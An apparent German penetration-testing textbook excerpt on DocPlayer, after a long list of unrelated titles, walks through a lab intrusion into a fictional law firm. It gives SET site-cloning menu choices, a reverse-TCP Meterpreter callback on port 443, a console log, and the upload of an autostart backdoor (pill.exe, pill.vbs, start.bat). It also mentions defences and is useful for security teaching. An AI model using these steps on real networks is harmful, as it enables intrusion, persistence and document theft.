5.15 In lokale Netzwerke über das Internet eindringen



Ähnliche Dokumente
Konfiguration von Igel ThinClients fu r den Zugriff via Netscaler Gateway auf eine Storefront/ XenDesktop 7 Umgebung

Matrix42. Use Case - Sicherung und Rücksicherung persönlicher Einstellungen über Personal Backup. Version September

Advoware mit VPN Zugriff lokaler Server / PC auf externe Datenbank

SharePoint Workspace 2010 Installieren & Konfigurieren

Eigenen WSUS Server mit dem UNI WSUS Server Synchronisieren

Meldung Lokale Anwendung inkompatibel oder Microsoft Silverlight ist nicht aktuell bei Anmeldung an lokal gespeicherter RWE SmartHome Anwendung

Daten Sichern mit dem QNAP NetBak Replicator 4.0

2. Installation unter Windows 8.1 mit Internetexplorer 11.0

2. Die eigenen Benutzerdaten aus orgamax müssen bekannt sein

2 Die Terminaldienste Prüfungsanforderungen von Microsoft: Lernziele:

Handbuch. timecard Connector Version: REINER SCT Kartengeräte GmbH & Co. KG Goethestr Furtwangen

Datensicherung EBV für Mehrplatz Installationen

Step by Step Webserver unter Windows Server von Christian Bartl

FTP-Server einrichten mit automatischem Datenupload für

Seite 1 von 14. Cookie-Einstellungen verschiedener Browser

Einrichtung des Cisco VPN Clients (IPSEC) in Windows7

Anti-Botnet-Beratungszentrum. Windows XP in fünf Schritten absichern

Windows Server 2008 (R2): Anwendungsplattform

NTR-Support Die neue Fernwartung

Einspielanleitung für das Update DdD Cowis backoffice DdD Cowis pos

Tapps mit XP-Mode unter Windows 7 64 bit (V2.0)

mysql - Clients MySQL - Abfragen eine serverbasierenden Datenbank

Internet online Update (Internet Explorer)

EKF Software Server. Handbuch. Version 2.1. Hersteller: 2008 mesics gmbh Berliner Platz Münster info@mesics.de

1 Installation QTrans V2.0 unter Windows NT4

Wichtige Hinweise zu den neuen Orientierungshilfen der Architekten-/Objektplanerverträge

Internet online Update (Mozilla Firefox)

ICS-Addin. Benutzerhandbuch. Version: 1.0

Prodanet ProductManager WinEdition

Formular»Fragenkatalog BIM-Server«

IBM Software Demos Tivoli Provisioning Manager for OS Deployment

IMAP Backup. Das Programm zum Sichern, Synchronisieren, Rücksichern und ansehen von gesicherten Mails. Hersteller: malu-soft

GS-Programme 2015 Allgemeines Zentralupdate

Um zu prüfen welche Version auf dem betroffenen Client enthalten ist, gehen Sie bitte wie folgt vor:

Starten der Software unter Windows XP

Datenübernahme von HKO 5.9 zur. Advolux Kanzleisoftware

Update und Konfiguraton mit dem ANTLOG Konfigurations-Assistenten

Installation des Zertifikats am Beispiel eines Exchang -Servers. Voraussetzungen. Zertifikate importieren. Outlook-Webaccess

Wissenswertes über LiveUpdate

Wählen Sie bitte START EINSTELLUNGEN SYSTEMSTEUERUNG VERWALTUNG und Sie erhalten unter Windows 2000 die folgende Darstellung:

Anleitung zum Prüfen von WebDAV

Anleitung Captain Logfex 2013

Tipps und Tricks zu den Updates

System-Update Addendum

Checkliste für die Behebung des Problems, wenn der PC Garmin USB GPS-Geräte nicht erkennt.

Installation des GeoShop Redirector für Apache (Stand ) ================================================================

Kurzanleitung zur Softwareverteilung von BitDefender Produkten...2

NX Standardinstallation

FrogSure Installation und Konfiguration

Herzlich willkommen bei der Installation des IPfonie -Softclients!

Einstellungen im Internet-Explorer (IE) (Stand 11/2013) für die Arbeit mit IOS2000 und DIALOG

Folgende Einstellungen sind notwendig, damit die Kommunikation zwischen Server und Client funktioniert:

Wie halte ich Ordnung auf meiner Festplatte?

Externe Abfrage von für Benutzer der HSA über Mozilla-Thunderbird

Anleitung zum Prüfen von WebDAV

Übung - Konfigurieren einer Windows Vista-Firewall

Herzlich Willkommen bei der nfon GmbH

Bitte beachten Sie die Installations-/Systemvoraussetzungen und freigegebenen Betriebssysteme.

Über die Internetseite Hier werden unter Download/aktuelle Versionen die verschiedenen Module als zip-dateien bereitgestellt.

Windows Server 2012 RC2 konfigurieren

1 Voraussetzungen für Einsatz des FRITZ! LAN Assistenten

SAPGUI-Installation. Windows Bit-Edition auf x64 (AMD) und Intel EM64T (nur die Editionen

Internet Explorer Version 6

Tipps und Tricks zur Installation von Java-basierten Programmen auf Handys

Nutzung von GiS BasePac 8 im Netzwerk

OUTLOOK-DATEN SICHERN

- Tau-Office UNA - Setup Einzelplatzinstallation. * Der griechische Buchstabe T (sprich Tau ) steht für Perfektion. Idee und Copyright: rocom GmbH

Die Installation des GeoShop Redirector für IIS (Internet Information Server, Version 4.0, 5.0 und 6.0) umfasst folgende Teilschritte:

EchoLink und Windows XP SP2

Lizenz-Server überwachen

Reborn Card Ultimate 8 Kurzanleitung Installation

Live Update (Auto Update)

HTBVIEWER INBETRIEBNAHME

How to install freesshd

Anleitung zum Computercheck Windows Firewall aktivieren oder eine kostenlose Firewall installieren

ACHTUNG: Es können gpx-dateien und mit dem GP7 aufgezeichnete trc-dateien umgewandelt werden.

Teamschool Installation/ Konvertierungsanleitung

Rillsoft Project - Installation der Software

Adressen der BA Leipzig

Verwendung des Terminalservers der MUG

Anleitung. Update/Aktualisierung EBV Einzelplatz Homepage. und Mängelkatalog

ANLEITUNG. Firmware Flash. Seite 1 von 7

Firewalls für Lexware Info Service konfigurieren

Schwachstellenanalyse 2012

Daten-Synchronisation zwischen dem ZDV-Webmailer und Outlook ( ) Zentrum für Datenverarbeitung der Universität Tübingen

Websites mit Dreamweaver MX und SSH ins Internet bringen

FTP-Leitfaden RZ. Benutzerleitfaden

Anschluß an Raiffeisen OnLine Installationsanleitung für Internet Explorer

Er musste so eingerichtet werden, dass das D-Laufwerk auf das E-Laufwerk gespiegelt

Installation / Aktualisierung von Druckertreibern unter Windows 7

Anleitung zur Installation von Tun EMUL 12.0

MSDE 2000 mit Service Pack 3a

FTP-Leitfaden Inhouse. Benutzerleitfaden

Backup der Progress Datenbank

Erste Hilfe. «/IE Cache & Cookies» Logout, alte Seiten erscheinen, Erfasstes verschwindet?

Dokumentation zur Versendung der Statistik Daten

Transkript:

222 5 Anwendungsszenarien Abschnitten deutlich gemacht. In unserem Beispiel war die Windows-Firewall ständig eingeschaltet. Die Datei Backdoor.exe wurde mit dem Online-Virenscanner von Trend Micro geprüft, der bereits in Abschnitt 5.9 zur Anwendung kam. Da das eingesetzte Virenschutzprogramm auf Signaturbasis arbeitet, konnte es offensichtlich die Backdoor nicht erkennen. Hier würde sicherlich ein Produkt, das proaktive Technologien einsetzt, die automatisch das Verhalten von Applikationen sowie die Netzwerkkommunikation analysieren, weiterhelfen und eine Bedrohung feststellen. Im Beispiel haben wir gesehen, dass das Zielsystem sich mit dem Angriffssystem auf Port 4444 verbindet. Dies könnte durch Einsatz einer Firewall entsprechend verhindert werden. 5.15 In lokale Netzwerke über das Internet eindringen In diesem Abschnitt werden wir nochmals das bereits vorgestellte Social-Engineer Toolkit nutzen und die grafische Oberfläche Armitage einsetzen. Die verwendeten Angriffsmethoden und Werkzeuge wurden teilweise in den vorherigen Szenarien behandelt bzw. erläutert. Um diesen Abschnitt verstehen zu können, sollten die Abschnitte 5.9 und 5.11 durchgearbeitet worden sein. 5.15.1 Das Szenario Dieses Szenario könnte sich so oder abgewandelt irgendwo in Deutschland ereignet haben. Firmen und Namen sind frei erfunden. Die Anwaltskanzlei Müller&Junghans hat schon seit längerer Zeit nach einer Möglichkeit gesucht, sich zu vergrößern, und will daher zwei weitere Rechtsanwälte einstellen. In diesem Zusammenhang ist geplant, das bestehende Netzwerk in der Kanzlei zu modernisieren und durch eine Firewall zu ergänzen. Die bisher auf einzelnen PCs gespeicherten Dateien sollen nun zentral auf einem Server abgelegt werden, auf dem regelmäßig eine Datensicherung gefahren wird. Die Kanzlei beauftragt eine kleine Firma vor Ort (Bluenet GmbH) mit der Beschaffung der benötigten Hard- und Software und der Installation aller Komponenten in den Büros der Mitarbeiter. Folgende Punkte werden festgelegt: Bereitstellung und Installation von 4 PCs und einem Dateiserver Installation von aktuellen Versionen des Betriebssystems Windows XP und einem Virenschutzprogramm Installation einer Firewall zur Absicherung der Kanzlei vor dem Internet Gewährleistung des regelmäßigen Updatemanagements aller installierten Komponenten Regelmäßiges Backup des Dateiservers und Lagerung der Dateien in einer sicheren Umgebung

5.15 In lokale Netzwerke über das Internet eindringen 223 Nach kurzer Zeit erscheint ein Mitarbeiter der Firma Bluenet GmbH und liefert die bereits vorinstallierten PCs und den Server aus. In den nächsten Tagen beschäftigt er sich mit der Installation der Firewall. Dies gestaltet sich relativ einfach, da der gesamte Netzwerkverkehr aus dem Internet geblockt werden soll. Es müssen nur einige Regeln eingepflegt werden, die den Anwälten die Nutzung des Internets (http und https) erlauben und den Zugriff auf den Mailserver (imap, smtp) eines externen Providers ermöglichen. Die Arbeit ist in wenigen Tagen abgeschlossen und die Mitarbeiter zeigen sich sehr zufrieden mit dieser Lösung. Nach einigen Wochen tauchen Unterlagen im Internet auf, die nur aus dieser Anwaltskanzlei stammen können. Da eine Fehlfunktion der Firewall vermutet wird, beauftragt die Kanzlei eine weitere Firma mit der Untersuchung. Das Untersuchungsergebnis zeigt, dass die Firewall ordnungsgemäß arbeitet, die installierte Software auf den PCs aktuell ist und die installierten Virenschutzprogramme über tagesaktuelle Signaturen verfügen. Der Dateiserver weist einige Schwachstellen auf, da einige Updates nicht installiert wurden. Die Firma Bluenet GmbH erklärt diesen Mangel mit der Unverträglichkeit der bereitzustellenden Patches mit anderer Software, die ebenfalls auf dem Dateiserver installiert ist. Da der Server aber über keine Verbindung in das Internet verfügt, wurde das Risiko als gering eingestuft. Wie konnte es den Tätern gelingen, die begehrten Dokumente zu entwenden? 5.15.2 Den Angriff vorbereiten Wer das Buch und insbesondere die vorherigen Szenarien aufmerksam durchgearbeitet hat, wird einige Ansatzpunkte für einen möglichen Angriff finden. Es wird sicherlich schwer sein, die installierte Firewall direkt zu überwinden. Der Angreifer sieht eine mögliche Chance darin, Schadcode auf einem verfügbaren Weg in das Netzwerk einzuschleusen und durch die Nutzer ausführen zu lassen. Er vermutet, dass die Firewall so konfiguriert ist, dass diese den von innen (LAN) initiierten Netzverkehr per SSL (Port 443) zulässt. Er geht außerdem davon aus, dass aktuelle Virenschutzprogramme eingesetzt werden, die möglicherweise das einzuschleusende Schadprogramm erkennen. Er entschließt sich, einen fingierten Webserver im Internet zu platzieren und diesen mit Schadcode zu versehen. Außerdem bereitet er eine E-Mail vor, die er an die Anwälte der Kanzlei Müller&Junghans adressiert und die sie animiert, auf einen entsprechenden Link zu klicken. Der Angreifer entscheidet sich, eine bekannte Webseite zu»klonen«. In Abschnitt 5.11 wurde gezeigt, wie man diesen Angriff (Java Attack Vector) mittels SET nachbilden kann. Um dieses Szenario in der Testumgebung nachstellen zu können, müssen wir mit einigen Hilfskonstruktionen leben. Abbildung 5 28 zeigt den Aufbau in unserem Testnetzwerk. Wir verwenden auch hier ausschließlich IP-Adressen aus einem

224 5 Anwendungsszenarien privaten Adressbereich. Der Angreifer wird durch eine Backtrack-VM simuliert. Die Client-PCs sind mit Windows XP ausgestattet, die mit aktueller Virenschutzsoftware versehen sind. Ein Windows Server 2003 wird als Dateiserver konfiguriert und als Firewall kommt die in Abschnitt 2.6.2 vorgestellte pfsense zum Einsatz. Abb. 5 28 Das Szenario im Testnetzwerk nachgestellt Für das»klonen«der Webseite verwenden wir das Social-Engineer Toolkit (SET). Benutzen Sie auch hier die gleichen Einstellungen, die bereits in Abschnitt 5.11 eingesetzt wurden. Die einzelnen Schritte werden hier noch einmal in Kurzform dargestellt: Social-Engineering Attacks (1) Website Attack Vector (2) Java Applet Attack Method (1) Site Cloner (2) hier beliebige Webseite angeben http://klone.me ShellCodeExec Alphanum Shellcode (13) Port of the listener (443) Windows Meterpreter, Reverse TCP (1) Alle notwendigen Komponenten werden nun konfiguriert, der Webservice gestartet und die Listener für die verschiedenen Betriebssysteme aktiviert. Der Angreifer wartet nun, dass Nutzer innerhalb des anzugreifenden Netzwerkes die URL http://192.168.111.229 aufrufen. Diese hat er vorher geschickt in einer E-Mail platziert. Auch hierzu könnte das SET unterstützend eingesetzt werden.

5.15 In lokale Netzwerke über das Internet eindringen 225 Abb. 5 29 Der Klick auf»ausführen«hat fatale Folgen. Wenn Nutzer im Zielnetzwerk den entsprechenden Hinweis (siehe Abb. 5 29) ignorieren und auf Ausführen klicken, sollte als Folge eine Meterpreter-Session in der Konsole des Angreifers geöffnet werden. Das installierte Virenschutzprogramm erkennt in der Regel diesen Angriff nicht. Der Angreifer wird nun bestrebt sein, eine entsprechende Hintertür zu installieren. Diese soll es ermöglichen, auch nach Zusammenbruch der Verbindung oder Neustart des PC immer wieder Zugriff auf dieses System zu erlangen. Um dies in unserer Testumgebung nachvollziehen zu können, werden wir den in Abschnitt 5.9 bereits genutzten Exploit verwenden. In unserem Beispiel hat der Nutzer Roeder (siehe Listing 5 78) auf den untergeschobenen Link geklickt. Der Angreifer kann nun mit dessen Rechten entsprechende Kommandos auf dem PC ausführen. Er wechselt sofort in das Verzeichnis des Nutzers Roeder. msf exploit(handler) > [*] 192.168.111.220:53937 Request received for /INITM... [*] 192.168.111.220:53937 Staging connection for target /INITM received... [*] Patched transport at offset 486516... [*] Patched URL at offset 486248... [*] Patched Expiration Timeout at offset 641856... [*] Patched Communication Timeout at offset 641860... [*] Meterpreter session 1 opened (192.168.111.229:443 -> 192.168.111.220:53937) at 2012-02-04 11:50:58 +0100 sessions -i 1

226 5 Anwendungsszenarien [*] Starting interaction with 1... meterpreter > getuid Server username: ROEDERPC\Roeder meterpreter > ls Listing: C:\Dokumente und Einstellungen\Roeder\Desktop ====================================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir 2012-01-13 18:28:12 +0100. 40777/rwxrwxrwx 0 dir 2012-02-02 20:30:36 +0100.. meterpreter > cd.. meterpreter > ls Listing: C:\Dokumente und Einstellungen\Roeder ============================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100666/rw-rw-rw- 190 fil 2012-02-04 11:46:55 +0100 ntuser.ini 100666/rw-rw-rw- 786432 fil 2012-02-04 11:46:55 +0100 NTUSER.DAT 100666/rw-rw-rw- 1024 fil 2012-02-04 11:51:04 +0100 NTUSER.DAT.LOG 40555/r-xr-xr-x 0 dir 2012-02-02 20:31:16 +0100 Anwendungsdaten Listing 5 78 Befehle auf dem Zielsystem als Nutzer Roeder ausführen Im Folgenden werden drei Dateien mit dem upload-befehl (siehe Listing 5 79) auf das Zielsystem übertragen. pill.exe nach C:\Dokumente und Einstellungen\roeder pill.vbs nach C:\Dokumente und Einstellungen\roeder start.bat nach C:\Dokumente und Einstellungen\roeder\Startmenü\Programme\Autostart Wer sich an dieser Stelle fragt, was die Dateien im Einzelnen beinhalten, sollte nochmals das Szenario in Abschnitt 5.9 anschauen. Die Datei pill.exe wurde ursprünglich als msf.exe mit SET erstellt und dann umbenannt. Das VBS-Skript pill.vbs wurde analog zum Beispiel (msf.vbs) erstellt und enthält u.a. den alphanumerisch codierten Payload. Die Batch-Datei start.bat beinhaltet nur eine Zeile (start pill.vbs) und wird in das Autostart-Verzeichnis des Nutzers platziert. Somit wird die automatische Ausführung der Hintertür nach erneuter Anmeldung des Nutzers auf seinem PC ermöglicht. Auch hier ist Voraussetzung, dass die installierten Dateien vom installierten Virenschutzprogramm nicht als Schadcode erkannt werden. Nach erfolgreicher Übertragung der Hintertür wird der Client- PC mit dem Befehl reboot neu gestartet.

5.15 In lokale Netzwerke über das Internet eindringen 227 meterpreter > upload /pentest/exploits/set/pill.exe. [*] uploading : /pentest/exploits/set/pill.exe ->. [*] uploaded : /pentest/exploits/set/pill.exe ->.\pill.exe meterpreter > upload /pentest/exploits/set/pill.vbs. [*] uploading : /pentest/exploits/set/pill.vbs ->. [*] uploaded : /pentest/exploits/set/pill.vbs ->.\pill.vbs meterpreter > ls Listing: C:\Dokumente und Einstellungen\Roeder ============================================== <snip> 40555/r-xr-xr-x 0 dir 2012-02-02 19:47:51 +0100 Recent 40555/r-xr-xr-x 0 dir 2012-01-13 18:28:12 +0100 $U$Startmen- 0x53746172746d656efc 40777/rwxrwxrwx 0 dir 2012-02-02 19:47:45 +0100 IETldCache <snip> 40777/rwxrwxrwx 0 dir 2012-01-13 18:28:12 +0100 Desktop 40777/rwxrwxrwx 0 dir 2012-02-04 11:50:50 +0100 Cookies 40777/rwxrwxrwx 0 dir 2012-01-13 18:31:15 +0100 Vorlagen 40777/rwxrwxrwx 0 dir 2012-02-02 19:47:41 +0100.. 40777/rwxrwxrwx 0 dir 2012-02-04 11:55:42 +0100. 40777/rwxrwxrwx 0 dir 2012-01-13 18:28:12 +0100 Lokale Einstellungen meterpreter > cd $U$Startmen-0x53746172746d656efc meterpreter > cd programme meterpreter > cd autostart meterpreter > upload start.bat. [*] uploading : start.bat ->. [*] uploaded : start.bat ->.\start.bat meterpreter > reboot Rebooting... Listing 5 79 Übertragen der Hintertür auf den PC in das Arbeitsverzeichnis des Nutzers Roeder Sicherlich werden die Angreifer geschicktere Methoden anwenden, um Hintertüren möglicherweise auch automatisiert zu installieren und entsprechend zu verschleiern. In diesem Beispiel soll nur die Vorgehensweise und Methode erläutert werden. 5.15.3 In das lokale Netzwerk eindringen In dieser zweiten Phase werden wir vorrangig mit Armitage arbeiten. Der PC des Rechtsanwaltes Roeder sollte nun so präpariert sein, dass bei jeder Anmeldung eine Meterpreter-Session zum PC des Angreifers geöffnet wird. Um die Daten ent-

2024 © DocPlayer.org Datenschutzbestimmungen | Nutzungsbedingungen | Feedback